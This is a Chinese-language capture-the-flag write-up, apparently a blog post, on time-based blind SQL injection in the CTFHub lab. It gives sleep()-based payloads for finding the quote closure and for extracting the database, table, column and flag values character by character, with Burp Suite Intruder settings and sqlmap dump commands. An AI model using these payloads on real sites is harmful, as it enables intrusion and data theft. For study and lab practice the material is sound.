时间盲注（ctfhub）

目录

时间盲注：web界面只返回一个正常页面。利用页面响应时间不同逐个猜解数据。

1.关键函数：

2.判断闭合方式。

 一、使用burpsuite进行半自动化注入

1.判断数据库名长度

 2.爆数据库名

使用burpsuite爆破

3.爆数据表名

使用burpsuite爆破 

4.爆数据列名

5.爆flag

二、python脚本注入

三、使用sqlmap工具

1.获取当前使用的数据库

2.获取指定数据库中的数据表

3.获取指定数据表中的数据列

4.获取指定数据列中的所有字段

---

时间盲注：web界面只返回一个正常页面。利用页面响应时间不同逐个猜解数据。

（数据库会执行命令代码，只是不反馈页面信息）

布尔盲注是通过回显的对错提示来判断是否成功

时间盲注是通过手动控制页面返回时间来判断是否成功。

1.关键函数：

sleep()函数：参数为休眠时长，可为小数，单位 秒。

select sleep();

if()函数：if(condition，true，false）condition为条件，条件为真时返回true，条件为假时返回false。

select if(1=1,sleep(0),sleep(3));
#1=1为真，执行休眠0秒
select if(1=2,sleep(0),sleep(3));
#1=2为假，执行休眠3秒

substr()函数：substr((),1,1) 从第一个字符开始，显示一个字符。

ascii()函数：ascii(character)得到字符的ASCII码值。

2.判断闭合方式。

能成功等待2秒响应的即为其闭合方式。

?id=1 and sleep(2)--+
?id=1' and sleep(2)--+
?id=1" and sleep(2)--+
?id=1') and sleep(2)--+
?id=1") and sleep(2)--+
...

 一、使用burpsuite进行半自动化注入

（手动注入与布尔盲注类似，可参考布尔盲注（ctfhub）-CSDN博客）

（布尔盲注也可使用burpsuite进行半自动化注入）

1.判断数据库名长度

?id=1 and if(length(database())>=5,sleep(3),sleep(1))
# 执行休眠1秒
?id=1 and if(length(database())>=4,sleep(3),sleep(1))
#执行休眠3秒
#数据库名长度为4

 2.爆数据库名

?id=1 and if(substring(database(),1,1)='a',sleep(5),sleep(1))
#执行休眠1秒
...
?id=1 and if(substring(database(),1,1)='s',sleep(5),sleep(1))
#执行休眠5秒
#数据库第一个字符为s
?id=1 and if(substring(database(),2,1)='q',sleep(5),sleep(1))
#执行休眠5秒
#数据库第一个字符为q

#随便输入一个字符，无论正确与否，使用burpsuite进行抓包，将抓到的包发送到intruder模块。

使用burpsuite爆破

（1）攻击类型选为Cluster bomb

（2）选择要进行爆破的字符，一个是第一个1，一个是a

（3）设置第一个字符的payload，类型为Numbers

（已经知道长度为4，可以直接设置为4，不知道时 设置比需要爆破字符的长度长。）

（4）设置第二个需要爆破字符的payload，类型为Simple list

（爆破字段为26个英文字母）

（5）点击开始攻击得到结果，sleep(5)要筛选出响应时间大于5s的数据包。

在columns里面勾选Response received和Response completed这两个选项，再进行筛选，响应时间最大的四个就是执行成功的——sqli。

（布尔盲注直接使用length进行筛选：按照length从高到低排序 前面四个即为结果，按照payload1的顺序进行排序得到数据库名sqli。）

3.爆数据表名

?id=1 and if(substring((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),1,1)='q',sleep(5),sleep(1))
#limit 0,1第一个表 substring((),1,1)从第一个字符开始，显示一个字符
...
?id=1 and if(substring((select table_name from information_schema.tables where table_schema='sqli' limit 1,1),1,1)='q',sleep(5),sleep(1))
##limit 1,1第二个表 substring((),1,1)从第一个字符开始，显示一个字符
...

使用burpsuite爆破 

步骤同上

第一个表flag

第二个表 news

第三个表 响应时间都差不多，不存在

4.爆数据列名

?id=1 and if(substring((select column_name from information_schema.columns where table_name='flag'),1,1)='q',sleep(5),sleep(1))

 第一个列flag

5.爆flag

此处payload1的长度较大 可为40，,payload2的字典除26个字母外还有10个数字 ’{’ ’}'这两个字符。

?id=1 and if(substring((select flag from sqli.flag),1,1)='q',sleep(5),1)

 排序有点麻烦ctfhub{fabf961c6fe1792b64158ce4}

二、python脚本注入

具体代码见：

CTFHub_技能树_Web之SQL注入——时间盲注详细原理讲解_保姆级手把手讲解自动化布尔盲注脚本编写_ctfhub时间盲注-CSDN博客

数据表名选择 flag

只有一个数据列，选择即可

得到flag

三、使用sqlmap工具

1.获取当前使用的数据库

sqlmap -u 'http://xx/?id=1 --current-db

2.获取指定数据库中的数据表

sqlmap -u 'http://xx/?id=1 -D 'sqli' --tables

3.获取指定数据表中的数据列

sqlmap -u 'http://xx/?id=1' -D 'sqli' -T 'flag' --columns

4.获取指定数据列中的所有字段

sqlmap -u 'http://xx/?id=1' -D 'sqli' -T 'flag' -C 'flag' --dump

# -D 指定库，-T指定表，-C 指定列（字段）

1.获取当前使用的数据库

2.获取指定数据库中的数据表

3.获取指定数据表中的数据列

4.获取指定数据列中的所有字段